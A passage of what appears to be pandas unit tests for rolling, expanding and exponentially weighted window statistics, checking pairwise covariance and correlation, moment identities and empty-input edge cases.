lambda x: x.ewm(com=3).corr(pairwise=True)])
def test_pairwise_with_self(self, f):
# DataFrame with itself, pairwise=True
# note that we may construct the 1st level of the MI
        # in a non-monotonic way, so compare accordingly
results = []
for i, df in enumerate(self.df1s):
result = f(df)
tm.assert_index_equal(result.index.levels[0],
df.index,
check_names=False)
tm.assert_numpy_array_equal(safe_sort(result.index.levels[1]),
safe_sort(df.columns.unique()))
tm.assert_index_equal(result.columns, df.columns)
            results.append(result)
for i, result in enumerate(results):
if i > 0:
self.compare(result, results[0])
@pytest.mark.parametrize(
'f', [lambda x: x.expanding().cov(pairwise=False),
lambda x: x.expanding().corr(pairwise=False),
lambda x: x.rolling(window=3).cov(pairwise=False),
lambda x: x.rolling(window=3).corr(pairwise=False),
lambda x: x.ewm(com=3).cov(pairwise=False),
lambda x: x.ewm(com=3).corr(pairwise=False), ])
def test_no_pairwise_with_self(self, f):
# DataFrame with itself, pairwise=False
results = [f(df) for df in self.df1s]
for (df, result) in zip(self.df1s, results):
tm.assert_index_equal(result.index, df.index)
tm.assert_index_equal(result.columns, df.columns)
for i, result in enumerate(results):
if i > 0:
self.compare(result, results[0])
@pytest.mark.parametrize(
'f', [lambda x, y: x.expanding().cov(y, pairwise=True),
lambda x, y: x.expanding().corr(y, pairwise=True),
lambda x, y: x.rolling(window=3).cov(y, pairwise=True),
lambda x, y: x.rolling(window=3).corr(y, pairwise=True),
lambda x, y: x.ewm(com=3).cov(y, pairwise=True),
lambda x, y: x.ewm(com=3).corr(y, pairwise=True), ])
def test_pairwise_with_other(self, f):
# DataFrame with another DataFrame, pairwise=True
results = [f(df, self.df2) for df in self.df1s]
for (df, result) in zip(self.df1s, results):
tm.assert_index_equal(result.index.levels[0],
df.index,
check_names=False)
tm.assert_numpy_array_equal(safe_sort(result.index.levels[1]),
safe_sort(self.df2.columns.unique()))
for i, result in enumerate(results):
if i > 0:
self.compare(result, results[0])
@pytest.mark.parametrize(
'f', [lambda x, y: x.expanding().cov(y, pairwise=False),
lambda x, y: x.expanding().corr(y, pairwise=False),
lambda x, y: x.rolling(window=3).cov(y, pairwise=False),
lambda x, y: x.rolling(window=3).corr(y, pairwise=False),
lambda x, y: x.ewm(com=3).cov(y, pairwise=False),
lambda x, y: x.ewm(com=3).corr(y, pairwise=False), ])
def test_no_pairwise_with_other(self, f):
# DataFrame with another DataFrame, pairwise=False
results = [f(df, self.df2) if df.columns.is_unique else None
for df in self.df1s]
for (df, result) in zip(self.df1s, results):
if result is not None:
with catch_warnings(record=True):
# we can have int and str columns
expected_index = df.index.union(self.df2.index)
expected_columns = df.columns.union(self.df2.columns)
tm.assert_index_equal(result.index, expected_index)
tm.assert_index_equal(result.columns, expected_columns)
else:
tm.assert_raises_regex(
ValueError, "'arg1' columns are not unique", f, df,
self.df2)
tm.assert_raises_regex(
ValueError, "'arg2' columns are not unique", f,
self.df2, df)
@pytest.mark.parametrize(
'f', [lambda x, y: x.expanding().cov(y),
lambda x, y: x.expanding().corr(y),
lambda x, y: x.rolling(window=3).cov(y),
lambda x, y: x.rolling(window=3).corr(y),
lambda x, y: x.ewm(com=3).cov(y),
lambda x, y: x.ewm(com=3).corr(y), ])
def test_pairwise_with_series(self, f):
# DataFrame with a Series
results = ([f(df, self.s) for df in self.df1s] +
[f(self.s, df) for df in self.df1s])
for (df, result) in zip(self.df1s, results):
tm.assert_index_equal(result.index, df.index)
tm.assert_index_equal(result.columns, df.columns)
for i, result in enumerate(results):
if i > 0:
self.compare(result, results[0])
# create the data only once as the tests do not mutate it
def _create_consistency_data():
def create_series():
return [Series(),
Series([np.nan]),
Series([np.nan, np.nan]),
Series([3.]),
Series([np.nan, 3.]),
Series([3., np.nan]),
Series([1., 3.]),
Series([2., 2.]),
Series([3., 1.]),
Series([5., 5., 5., 5., np.nan, np.nan, np.nan, 5., 5., np.nan,
np.nan]),
Series([np.nan, 5., 5., 5., np.nan, np.nan, np.nan, 5., 5.,
np.nan, np.nan]),
Series([np.nan, np.nan, 5., 5., np.nan, np.nan, np.nan, 5., 5.,
np.nan, np.nan]),
Series([np.nan, 3., np.nan, 3., 4., 5., 6., np.nan, np.nan, 7.,
12., 13., 14., 15.]),
Series([np.nan, 5., np.nan, 2., 4., 0., 9., np.nan, np.nan, 3.,
12., 13., 14., 15.]),
Series([2., 3., np.nan, 3., 4., 5., 6., np.nan, np.nan, 7.,
12., 13., 14., 15.]),
Series([2., 5., np.nan, 2., 4., 0., 9., np.nan, np.nan, 3.,
12., 13., 14., 15.]),
Series(range(10)),
Series(range(20, 0, -2)), ]
def create_dataframes():
return ([DataFrame(),
DataFrame(columns=['a']),
DataFrame(columns=['a', 'a']),
DataFrame(columns=['a', 'b']),
DataFrame(np.arange(10).reshape((5, 2))),
DataFrame(np.arange(25).reshape((5, 5))),
DataFrame(np.arange(25).reshape((5, 5)),
columns=['a', 'b', 99, 'd', 'd'])] +
[DataFrame(s) for s in create_series()])
def is_constant(x):
values = x.values.ravel()
return len(set(values[notna(values)])) == 1
def no_nans(x):
return x.notna().all().all()
    # each entry is a tuple (object, is_constant, no_nans)
data = create_series() + create_dataframes()
return [(x, is_constant(x), no_nans(x)) for x in data]
_consistency_data = _create_consistency_data()
def _rolling_consistency_cases():
for window in [1, 2, 3, 10, 20]:
for min_periods in set([0, 1, 2, 3, 4, window]):
if min_periods and (min_periods > window):
continue
for center in [False, True]:
yield window, min_periods, center
class TestMomentsConsistency(Base):
base_functions = [
(lambda v: Series(v).count(), None, 'count'),
(lambda v: Series(v).max(), None, 'max'),
(lambda v: Series(v).min(), None, 'min'),
(lambda v: Series(v).sum(), None, 'sum'),
(lambda v: Series(v).mean(), None, 'mean'),
(lambda v: Series(v).std(), 1, 'std'),
(lambda v: Series(v).cov(Series(v)), None, 'cov'),
(lambda v: Series(v).corr(Series(v)), None, 'corr'),
(lambda v: Series(v).var(), 1, 'var'),
        # restore once GH 8086 is fixed
        # (lambda v: Series(v).skew(), 3, 'skew'),
        # (lambda v: Series(v).kurt(), 4, 'kurt'),
        # restore once GH 8084 is fixed
        # (lambda v: Series(v).quantile(0.3), None, 'quantile'),
(lambda v: Series(v).median(), None, 'median'),
(np.nanmax, 1, 'max'),
(np.nanmin, 1, 'min'),
(np.nansum, 1, 'sum'),
(np.nanmean, 1, 'mean'),
(lambda v: np.nanstd(v, ddof=1), 1, 'std'),
(lambda v: np.nanvar(v, ddof=1), 1, 'var'),
(np.nanmedian, 1, 'median'),
]
no_nan_functions = [
(np.max, None, 'max'),
(np.min, None, 'min'),
(np.sum, None, 'sum'),
(np.mean, None, 'mean'),
(lambda v: np.std(v, ddof=1), 1, 'std'),
(lambda v: np.var(v, ddof=1), 1, 'var'),
(np.median, None, 'median'),
]
def _create_data(self):
super(TestMomentsConsistency, self)._create_data()
self.data = _consistency_data
def setup_method(self, method):
self._create_data()
def _test_moments_consistency(self, min_periods, count, mean, mock_mean,
corr, var_unbiased=None, std_unbiased=None,
cov_unbiased=None, var_biased=None,
std_biased=None, cov_biased=None,
var_debiasing_factors=None):
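        # for every (object, is_constant, no_nans) fixture this checks the
        # moment identities exercised below, e.g. var(x) == cov(x, x),
        # var(x) == std(x) ** 2, biased var(x) == mean(x ** 2) - mean(x) ** 2,
        # cov(x, y) == (var(x + y) - var(x) - var(y)) / 2 and
        # corr(x, y) == cov(x, y) / (std(x) * std(y))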
def _non_null_values(x):
values = x.values.ravel()
return set(values[notna(values)].tolist())
for (x, is_constant, no_nans) in self.data:
count_x = count(x)
mean_x = mean(x)
if mock_mean:
# check that mean equals mock_mean
expected = mock_mean(x)
assert_equal(mean_x, expected.astype('float64'))
# check that correlation of a series with itself is either 1 or NaN
corr_x_x = corr(x, x)
# assert _non_null_values(corr_x_x).issubset(set([1.]))
# restore once rolling_cov(x, x) is identically equal to var(x)
if is_constant:
exp = x.max() if isinstance(x, Series) else x.max().max()
# check mean of constant series
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = exp
assert_equal(mean_x, expected)
# check correlation of constant series with itself is NaN
expected[:] = np.nan
assert_equal(corr_x_x, expected)
if var_unbiased and var_biased and var_debiasing_factors:
# check variance debiasing factors
var_unbiased_x = var_unbiased(x)
var_biased_x = var_biased(x)
var_debiasing_factors_x = var_debiasing_factors(x)
assert_equal(var_unbiased_x, var_biased_x *
var_debiasing_factors_x)
for (std, var, cov) in [(std_biased, var_biased, cov_biased),
(std_unbiased, var_unbiased, cov_unbiased)
]:
# check that var(x), std(x), and cov(x) are all >= 0
var_x = var(x)
std_x = std(x)
assert not (var_x < 0).any().any()
assert not (std_x < 0).any().any()
if cov:
cov_x_x = cov(x, x)
assert not (cov_x_x < 0).any().any()
# check that var(x) == cov(x, x)
assert_equal(var_x, cov_x_x)
# check that var(x) == std(x)^2
assert_equal(var_x, std_x * std_x)
if var is var_biased:
# check that biased var(x) == mean(x^2) - mean(x)^2
mean_x2 = mean(x * x)
assert_equal(var_x, mean_x2 - (mean_x * mean_x))
if is_constant:
# check that variance of constant series is identically 0
assert not (var_x > 0).any().any()
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = 0.
if var is var_unbiased:
expected[count_x < 2] = np.nan
assert_equal(var_x, expected)
if isinstance(x, Series):
for (y, is_constant, no_nans) in self.data:
if not x.isna().equals(y.isna()):
# can only easily test two Series with similar
# structure
continue
# check that cor(x, y) is symmetric
corr_x_y = corr(x, y)
corr_y_x = corr(y, x)
assert_equal(corr_x_y, corr_y_x)
if cov:
# check that cov(x, y) is symmetric
cov_x_y = cov(x, y)
cov_y_x = cov(y, x)
assert_equal(cov_x_y, cov_y_x)
# check that cov(x, y) == (var(x+y) - var(x) -
# var(y)) / 2
var_x_plus_y = var(x + y)
var_y = var(y)
assert_equal(cov_x_y, 0.5 *
(var_x_plus_y - var_x - var_y))
# check that corr(x, y) == cov(x, y) / (std(x) *
# std(y))
std_y = std(y)
assert_equal(corr_x_y, cov_x_y / (std_x * std_y))
if cov is cov_biased:
# check that biased cov(x, y) == mean(x*y) -
# mean(x)*mean(y)
mean_y = mean(y)
mean_x_times_y = mean(x * y)
assert_equal(cov_x_y, mean_x_times_y -
(mean_x * mean_y))
@pytest.mark.slow
@pytest.mark.parametrize('min_periods', [0, 1, 2, 3, 4])
@pytest.mark.parametrize('adjust', [True, False])
@pytest.mark.parametrize('ignore_na', [True, False])
def test_ewm_consistency(self, min_periods, adjust, ignore_na):
def _weights(s, com, adjust, ignore_na):
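            # brute-force EWM weights: with adjust=True observation i gets
            # relative weight (1 - alpha) ** -i, with adjust=False the
            # weights follow the recursive definition; ignore_na=True
            # computes the weights over the non-NaN observations only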
if isinstance(s, DataFrame):
if not len(s.columns):
return DataFrame(index=s.index, columns=s.columns)
w = concat([
_weights(s.iloc[:, i], com=com, adjust=adjust,
ignore_na=ignore_na)
for i, _ in enumerate(s.columns)], axis=1)
w.index = s.index
w.columns = s.columns
return w
w = Series(np.nan, index=s.index)
alpha = 1. / (1. + com)
if ignore_na:
w[s.notna()] = _weights(s[s.notna()], com=com,
adjust=adjust, ignore_na=False)
elif adjust:
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
w.iat[i] = pow(1. / (1. - alpha), i)
else:
sum_wts = 0.
prev_i = -1
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
if prev_i == -1:
w.iat[i] = 1.
else:
w.iat[i] = alpha * sum_wts / pow(1. - alpha,
i - prev_i)
sum_wts += w.iat[i]
prev_i = i
return w
def _variance_debiasing_factors(s, com, adjust, ignore_na):
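            # reliability-weights bias correction:
            # factor = (sum w) ** 2 / ((sum w) ** 2 - sum w ** 2),
            # undefined (NaN) when the denominator is not positive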
weights = _weights(s, com=com, adjust=adjust, ignore_na=ignore_na)
cum_sum = weights.cumsum().fillna(method='ffill')
cum_sum_sq = (weights * weights).cumsum().fillna(method='ffill')
numerator = cum_sum * cum_sum
denominator = numerator - cum_sum_sq
denominator[denominator <= 0.] = np.nan
return numerator / denominator
def _ewma(s, com, min_periods, adjust, ignore_na):
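            # reference implementation of ewm(...).mean() as a weighted
            # cumulative average, cumsum(w * s) / cumsum(w), masked below
            # min_periods non-NaN observations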
weights = _weights(s, com=com, adjust=adjust, ignore_na=ignore_na)
result = s.multiply(weights).cumsum().divide(weights.cumsum(
)).fillna(method='ffill')
result[s.expanding().count() < (max(min_periods, 1) if min_periods
else 1)] = np.nan
return result
com = 3.
# test consistency between different ewm* moments
self._test_moments_consistency(
min_periods=min_periods,
count=lambda x: x.expanding().count(),
mean=lambda x: x.ewm(com=com, min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na).mean(),
mock_mean=lambda x: _ewma(x, com=com,
min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na),
corr=lambda x, y: x.ewm(com=com, min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na).corr(y),
var_unbiased=lambda x: (
x.ewm(com=com, min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na).var(bias=False)),
std_unbiased=lambda x: (
x.ewm(com=com, min_periods=min_periods,
adjust=adjust, ignore_na=ignore_na)
.std(bias=False)),
cov_unbiased=lambda x, y: (
x.ewm(com=com, min_periods=min_periods,
adjust=adjust, ignore_na=ignore_na)
.cov(y, bias=False)),
var_biased=lambda x: (
x.ewm(com=com, min_periods=min_periods,
adjust=adjust, ignore_na=ignore_na)
.var(bias=True)),
std_biased=lambda x: x.ewm(com=com, min_periods=min_periods,
adjust=adjust,
ignore_na=ignore_na).std(bias=True),
cov_biased=lambda x, y: (
x.ewm(com=com, min_periods=min_periods,
adjust=adjust, ignore_na=ignore_na)
.cov(y, bias=True)),
var_debiasing_factors=lambda x: (
_variance_debiasing_factors(x, com=com, adjust=adjust,
ignore_na=ignore_na)))
@pytest.mark.slow
@pytest.mark.parametrize(
'min_periods', [0, 1, 2, 3, 4])
def test_expanding_consistency(self, min_periods):
# suppress warnings about empty slices, as we are deliberately testing
# with empty/0-length Series/DataFrames
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message=".*(empty slice|0 for slice).*",
category=RuntimeWarning)
# test consistency between different expanding_* moments
self._test_moments_consistency(
min_periods=min_periods,
count=lambda x: x.expanding().count(),
mean=lambda x: x.expanding(
min_periods=min_periods).mean(),
mock_mean=lambda x: x.expanding(
min_periods=min_periods).sum() / x.expanding().count(),
corr=lambda x, y: x.expanding(
min_periods=min_periods).corr(y),
var_unbiased=lambda x: x.expanding(
min_periods=min_periods).var(),
std_unbiased=lambda x: x.expanding(
min_periods=min_periods).std(),
cov_unbiased=lambda x, y: x.expanding(
min_periods=min_periods).cov(y),
var_biased=lambda x: x.expanding(
min_periods=min_periods).var(ddof=0),
std_biased=lambda x: x.expanding(
min_periods=min_periods).std(ddof=0),
cov_biased=lambda x, y: x.expanding(
min_periods=min_periods).cov(y, ddof=0),
var_debiasing_factors=lambda x: (
x.expanding().count() /
(x.expanding().count() - 1.)
.replace(0., np.nan)))
# test consistency between expanding_xyz() and either (a)
# expanding_apply of Series.xyz(), or (b) expanding_apply of
# np.nanxyz()
for (x, is_constant, no_nans) in self.data:
functions = self.base_functions
# GH 8269
if no_nans:
functions = self.base_functions + self.no_nan_functions
for (f, require_min_periods, name) in functions:
expanding_f = getattr(
x.expanding(min_periods=min_periods), name)
if (require_min_periods and
(min_periods is not None) and
(min_periods < require_min_periods)):
continue
if name == 'count':
expanding_f_result = expanding_f()
expanding_apply_f_result = x.expanding(
min_periods=0).apply(func=f, raw=True)
else:
if name in ['cov', 'corr']:
expanding_f_result = expanding_f(
pairwise=False)
else:
expanding_f_result = expanding_f()
expanding_apply_f_result = x.expanding(
min_periods=min_periods).apply(func=f, raw=True)
# GH 9422
if name in ['sum', 'prod']:
assert_equal(expanding_f_result,
expanding_apply_f_result)
@pytest.mark.slow
@pytest.mark.parametrize(
'window,min_periods,center', list(_rolling_consistency_cases()))
def test_rolling_consistency(self, window, min_periods, center):
# suppress warnings about empty slices, as we are deliberately testing
# with empty/0-length Series/DataFrames
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message=".*(empty slice|0 for slice).*",
category=RuntimeWarning)
# test consistency between different rolling_* moments
self._test_moments_consistency(
min_periods=min_periods,
count=lambda x: (
x.rolling(window=window, center=center)
.count()),
mean=lambda x: (
x.rolling(window=window, min_periods=min_periods,
center=center).mean()),
mock_mean=lambda x: (
x.rolling(window=window,
min_periods=min_periods,
center=center).sum()
.divide(x.rolling(window=window,
min_periods=min_periods,
center=center).count())),
corr=lambda x, y: (
x.rolling(window=window, min_periods=min_periods,
center=center).corr(y)),
var_unbiased=lambda x: (
x.rolling(window=window, min_periods=min_periods,
center=center).var()),
std_unbiased=lambda x: (
x.rolling(window=window, min_periods=min_periods,
center=center).std()),
cov_unbiased=lambda x, y: (
x.rolling(window=window, min_periods=min_periods,
center=center).cov(y)),
var_biased=lambda x: (
x.rolling(window=window, min_periods=min_periods,
center=center).var(ddof=0)),
std_biased=lambda x: (
x.rolling(window=window, min_periods=min_periods,
center=center).std(ddof=0)),
cov_biased=lambda x, y: (
x.rolling(window=window, min_periods=min_periods,
center=center).cov(y, ddof=0)),
var_debiasing_factors=lambda x: (
x.rolling(window=window, center=center).count()
.divide((x.rolling(window=window, center=center)
.count() - 1.)
.replace(0., np.nan))))
# test consistency between rolling_xyz() and either (a)
# rolling_apply of Series.xyz(), or (b) rolling_apply of
# np.nanxyz()
for (x, is_constant, no_nans) in self.data:
functions = self.base_functions
# GH 8269
if no_nans:
functions = self.base_functions + self.no_nan_functions
for (f, require_min_periods, name) in functions:
rolling_f = getattr(
x.rolling(window=window, center=center,
min_periods=min_periods), name)
if require_min_periods and (
min_periods is not None) and (
min_periods < require_min_periods):
continue
if name == 'count':
rolling_f_result = rolling_f()
rolling_apply_f_result = x.rolling(
window=window, min_periods=0,
center=center).apply(func=f, raw=True)
else:
if name in ['cov', 'corr']:
rolling_f_result = rolling_f(
pairwise=False)
else:
rolling_f_result = rolling_f()
rolling_apply_f_result = x.rolling(
window=window, min_periods=min_periods,
center=center).apply(func=f, raw=True)
# GH 9422
if name in ['sum', 'prod']:
assert_equal(rolling_f_result,
rolling_apply_f_result)
# binary moments
def test_rolling_cov(self):
A = self.series
B = A + randn(len(A))
result = A.rolling(window=50, min_periods=25).cov(B)
tm.assert_almost_equal(result[-1], np.cov(A[-50:], B[-50:])[0, 1])
def test_rolling_cov_pairwise(self):
self._check_pairwise_moment('rolling', 'cov', window=10, min_periods=5)
def test_rolling_corr(self):
A = self.series
B = A + randn(len(A))
result = A.rolling(window=50, min_periods=25).corr(B)
tm.assert_almost_equal(result[-1], np.corrcoef(A[-50:], B[-50:])[0, 1])
# test for correct bias correction
a = tm.makeTimeSeries()
b = tm.makeTimeSeries()
a[:5] = np.nan
b[:10] = np.nan
result = a.rolling(window=len(a), min_periods=1).corr(b)
tm.assert_almost_equal(result[-1], a.corr(b))
def test_rolling_corr_pairwise(self):
self._check_pairwise_moment('rolling', 'corr', window=10,
min_periods=5)
@pytest.mark.parametrize('window', range(7))
def test_rolling_corr_with_zero_variance(self, window):
# GH 18430
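        # the rolling std of a constant series is 0, so the correlation is
        # undefined and should come back as NaN rather than +/-inf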
s = pd.Series(np.zeros(20))
other = pd.Series(np.arange(20))
assert s.rolling(window=window).corr(other=other).isna().all()
def _check_pairwise_moment(self, dispatch, name, **kwargs):
def get_result(obj, obj2=None):
return getattr(getattr(obj, dispatch)(**kwargs), name)(obj2)
result = get_result(self.frame)
result = result.loc[(slice(None), 1), 5]
result.index = result.index.droplevel(1)
expected = get_result(self.frame[1], self.frame[5])
tm.assert_series_equal(result, expected, check_names=False)
def test_flex_binary_moment(self):
# GH3155
# don't blow the stack
pytest.raises(TypeError, rwindow._flex_binary_moment, 5, 6, None)
def test_corr_sanity(self):
# GH 3155
df = DataFrame(np.array(
[[0.87024726, 0.18505595], [0.64355431, 0.3091617],
[0.92372966, 0.50552513], [0.00203756, 0.04520709],
[0.84780328, 0.33394331], [0.78369152, 0.63919667]]))
res = df[0].rolling(5, center=True).corr(df[1])
assert all(np.abs(np.nan_to_num(x)) <= 1 for x in res)
# and some fuzzing
for _ in range(10):
df = DataFrame(np.random.rand(30, 2))
res = df[0].rolling(5, center=True).corr(df[1])
            try:
                assert all(np.abs(np.nan_to_num(x)) <= 1 for x in res)
            except AssertionError:
                print(res)
                raise
@pytest.mark.parametrize('method', ['corr', 'cov'])
def test_flex_binary_frame(self, method):
series = self.frame[1]
res = getattr(series.rolling(window=10), method)(self.frame)
res2 = getattr(self.frame.rolling(window=10), method)(series)
exp = self.frame.apply(lambda x: getattr(
series.rolling(window=10), method)(x))
tm.assert_frame_equal(res, exp)
tm.assert_frame_equal(res2, exp)
frame2 = self.frame.copy()
frame2.values[:] = np.random.randn(*frame2.shape)
res3 = getattr(self.frame.rolling(window=10), method)(frame2)
exp = DataFrame(dict((k, getattr(self.frame[k].rolling(
window=10), method)(frame2[k])) for k in self.frame))
tm.assert_frame_equal(res3, exp)
def test_ewmcov(self):
self._check_binary_ew('cov')
def test_ewmcov_pairwise(self):
self._check_pairwise_moment('ewm', 'cov', span=10, min_periods=5)
def test_ewmcorr(self):
self._check_binary_ew('corr')
def test_ewmcorr_pairwise(self):
self._check_pairwise_moment('ewm', 'corr', span=10, min_periods=5)
def _check_binary_ew(self, name):
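        # helper: check ewm cov/corr between two NaN-padded series, including
        # min_periods handling (GH 7898) and the zero- and one-element
        # edge cases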
def func(A, B, com, **kwargs):
return getattr(A.ewm(com, **kwargs), name)(B)
A = Series(randn(50), index=np.arange(50))
B = A[2:] + randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = func(A, B, 20, min_periods=5)
assert np.isnan(result.values[:14]).all()
assert not np.isnan(result.values[14:]).any()
# GH 7898
for min_periods in (0, 1, 2):
result = func(A, B, 20, min_periods=min_periods)
# binary functions (ewmcov, ewmcorr) with bias=False require at
# least two values
assert np.isnan(result.values[:11]).all()
assert not np.isnan(result.values[11:]).any()
# check series of length 0
result = func(Series([]), Series([]), 50, min_periods=min_periods)
tm.assert_series_equal(result, Series([]))
# check series of length 1
result = func(
Series([1.]), Series([1.]), 50, min_periods=min_periods)
tm.assert_series_equal(result, Series([np.NaN]))
pytest.raises(Exception, func, A, randn(50), 20, min_periods=5)
def test_expanding_apply_args_kwargs(self, raw):
def mean_w_arg(x, const):
return np.mean(x) + const
df = DataFrame(np.random.rand(20, 3))
expected = df.expanding().apply(np.mean, raw=raw) + 20.
result = df.expanding().apply(mean_w_arg,
raw=raw,
args=(20, ))
tm.assert_frame_equal(result, expected)
result = df.expanding().apply(mean_w_arg,
raw=raw,
kwargs={'const': 20})
tm.assert_frame_equal(result, expected)
def test_expanding_corr(self):
A = self.series.dropna()
B = (A + randn(len(A)))[:-5]
result = A.expanding().corr(B)
rolling_result = A.rolling(window=len(A), min_periods=1).corr(B)
tm.assert_almost_equal(rolling_result, result)
def test_expanding_count(self):
result = self.series.expanding().count()
tm.assert_almost_equal(result, self.series.rolling(
window=len(self.series)).count())
def test_expanding_quantile(self):
result = self.series.expanding().quantile(0.5)
rolling_result = self.series.rolling(window=len(self.series),
min_periods=1).quantile(0.5)
tm.assert_almost_equal(result, rolling_result)
def test_expanding_cov(self):
A = self.series
B = (A + randn(len(A)))[:-5]
result = A.expanding().cov(B)
rolling_result = A.rolling(window=len(A), min_periods=1).cov(B)
tm.assert_almost_equal(rolling_result, result)
def test_expanding_cov_pairwise(self):
result = self.frame.expanding().corr()
rolling_result = self.frame.rolling(window=len(self.frame),
min_periods=1).corr()
tm.assert_frame_equal(result, rolling_result)
def test_expanding_corr_pairwise(self):
result = self.frame.expanding().corr()
rolling_result = self.frame.rolling(window=len(self.frame),
min_periods=1).corr()
tm.assert_frame_equal(result, rolling_result)
def test_expanding_cov_diff_index(self):
# GH 7512
s1 = Series([1, 2, 3], index=[0, 1, 2])
s2 = Series([1, 3], index=[0, 2])
result = s1.expanding().cov(s2)
expected = Series([None, None, 2.0])
tm.assert_series_equal(result, expected)
s2a = Series([1, None, 3], index=[0, 1, 2])
result = s1.expanding().cov(s2a)
tm.assert_series_equal(result, expected)
s1 = Series([7, 8, 10], index=[0, 1, 3])
s2 = Series([7, 9, 10], index=[0, 2, 3])
result = s1.expanding().cov(s2)
expected = Series([None, None, None, 4.5])
tm.assert_series_equal(result, expected)
def test_expanding_corr_diff_index(self):
# GH 7512
s1 = Series([1, 2, 3], index=[0, 1, 2])
s2 = Series([1, 3], index=[0, 2])
result = s1.expanding().corr(s2)
expected = Series([None, None, 1.0])
tm.assert_series_equal(result, expected)
s2a = Series([1, None, 3], index=[0, 1, 2])
result = s1.expanding().corr(s2a)
tm.assert_series_equal(result, expected)
s1 = Series([7, 8, 10], index=[0, 1, 3])
s2 = Series([7, 9, 10], index=[0, 2, 3])
result = s1.expanding().corr(s2)
expected = Series([None, None, None, 1.])
tm.assert_series_equal(result, expected)
def test_rolling_cov_diff_length(self):
# GH 7512
s1 = Series([1, 2, 3], index=[0, 1, 2])
s2 = Series([1, 3], index=[0, 2])
result = s1.rolling(window=3, min_periods=2).cov(s2)
expected = Series([None, None, 2.0])
tm.assert_series_equal(result, expected)
s2a = Series([1, None, 3], index=[0, 1, 2])
result = s1.rolling(window=3, min_periods=2).cov(s2a)
tm.assert_series_equal(result, expected)
def test_rolling_corr_diff_length(self):
# GH 7512
s1 = Series([1, 2, 3], index=[0, 1, 2])
s2 = Series([1, 3], index=[0, 2])
result = s1.rolling(window=3, min_periods=2).corr(s2)
expected = Series([None, None, 1.0])
tm.assert_series_equal(result, expected)
s2a = Series([1, None, 3], index=[0, 1, 2])
result = s1.rolling(window=3, min_periods=2).corr(s2a)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
'f',
[
lambda x: (x.rolling(window=10, min_periods=5)
.cov(x, pairwise=False)),
lambda x: (x.rolling(window=10, min_periods=5)
.corr(x, pairwise=False)),
lambda x: x.rolling(window=10, min_periods=5).max(),
lambda x: x.rolling(window=10, min_periods=5).min(),
lambda x: x.rolling(window=10, min_periods=5).sum(),
lambda x: x.rolling(window=10, min_periods=5).mean(),
lambda x: x.rolling(window=10, min_periods=5).std(),
lambda x: x.rolling(window=10, min_periods=5).var(),
lambda x: x.rolling(window=10, min_periods=5).skew(),
lambda x: x.rolling(window=10, min_periods=5).kurt(),
lambda x: x.rolling(
window=10, min_periods=5).quantile(quantile=0.5),
lambda x: x.rolling(window=10, min_periods=5).median(),
lambda x: x.rolling(window=10, min_periods=5).apply(
sum, raw=False),
lambda x: x.rolling(window=10, min_periods=5).apply(
sum, raw=True),
lambda x: x.rolling(win_type='boxcar',
window=10, min_periods=5).mean()])
def test_rolling_functions_window_non_shrinkage(self, f):
# GH 7764
s = Series(range(4))
s_expected = Series(np.nan, index=s.index)
df = DataFrame([[1, 5], [3, 2], [3, 9], [-1, 0]], columns=['A', 'B'])
df_expected = DataFrame(np.nan, index=df.index, columns=df.columns)
try:
s_result = f(s)
tm.assert_series_equal(s_result, s_expected)
df_result = f(df)
tm.assert_frame_equal(df_result, df_expected)
except (ImportError):
# scipy needed for rolling_window
pytest.skip("scipy not available")
def test_rolling_functions_window_non_shrinkage_binary(self):
# corr/cov return a MI DataFrame
df = DataFrame([[1, 5], [3, 2], [3, 9], [-1, 0]],
columns=Index(['A', 'B'], name='foo'),
index=Index(range(4), name='bar'))
df_expected = DataFrame(
columns=Index(['A', 'B'], name='foo'),
index=pd.MultiIndex.from_product([df.index, df.columns],
names=['bar', 'foo']),
dtype='float64')
functions = [lambda x: (x.rolling(window=10, min_periods=5)
.cov(x, pairwise=True)),
lambda x: (x.rolling(window=10, min_periods=5)
.corr(x, pairwise=True))]
for f in functions:
df_result = f(df)
tm.assert_frame_equal(df_result, df_expected)
def test_moment_functions_zero_length(self):
# GH 8056
s = Series()
s_expected = s
df1 = DataFrame()
df1_expected = df1
df2 = DataFrame(columns=['a'])
df2['a'] = df2['a'].astype('float64')
df2_expected = df2
functions = [lambda x: x.expanding().count(),
lambda x: x.expanding(min_periods=5).cov(
x, pairwise=False),
lambda x: x.expanding(min_periods=5).corr(
x, pairwise=False),
lambda x: x.expanding(min_periods=5).max(),
lambda x: x.expanding(min_periods=5).min(),
lambda x: x.expanding(min_periods=5).sum(),
lambda x: x.expanding(min_periods=5).mean(),
lambda x: x.expanding(min_periods=5).std(),
lambda x: x.expanding(min_periods=5).var(),
lambda x: x.expanding(min_periods=5).skew(),
lambda x: x.expanding(min_periods=5).kurt(),
lambda x: x.expanding(min_periods=5).quantile(0.5),
lambda x: x.expanding(min_periods=5).median(),
lambda x: x.expanding(min_periods=5).apply(
sum, raw=False),
lambda x: x.expanding(min_periods=5).apply(
sum, raw=True),
lambda x: x.rolling(window=10).count(),
lambda x: x.rolling(window=10, min_periods=5).cov(
x, pairwise=False),
lambda x: x.rolling(window=10, min_periods=5).corr(
x, pairwise=False),
lambda x: x.rolling(window=10, min_periods=5).max(),
lambda x: x.rolling(window=10, min_periods=5).min(),
lambda x: x.rolling(window=10, min_periods=5).sum(),
lambda x: x.rolling(window=10, min_periods=5).mean(),
lambda x: x.rolling(window=10, min_periods=5).std(),
lambda x: x.rolling(window=10, min_periods=5).var(),
lambda x: x.rolling(window=10, min_periods=5).skew(),
lambda x: x.rolling(window=10, min_periods=5).kurt(),
lambda x: x.rolling(
window=10, min_periods=5).quantile(0.5),
lambda x: x.rolling(window=10, min_periods=5).median(),
lambda x: x.rolling(window=10, min_periods=5).apply(
sum, raw=False),
lambda x: x.rolling(window=10, min_periods=5).apply(
sum, raw=True),
lambda x: x.rolling(win_type='boxcar',
window=10, min_periods=5).mean(),
]
for f in functions:
try:
s_result = f(s)
tm.assert_series_equal(s_result, s_expected)
df1_result = f(df1)
tm.assert_frame_equal(df1_result, df1_expected)
